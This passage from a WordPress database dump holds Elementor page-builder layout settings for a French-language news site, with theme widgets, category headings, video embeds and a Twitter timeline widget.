\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q6423zs\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"orderby\":\"meta_value\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2276,741,'_elementor_version','0.4'),(2277,741,'_elementor_css','a:3:{s:4:\"time\";i:1509368757;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2279,742,'_elementor_edit_mode','builder'),(2280,742,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"38qoe55\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos 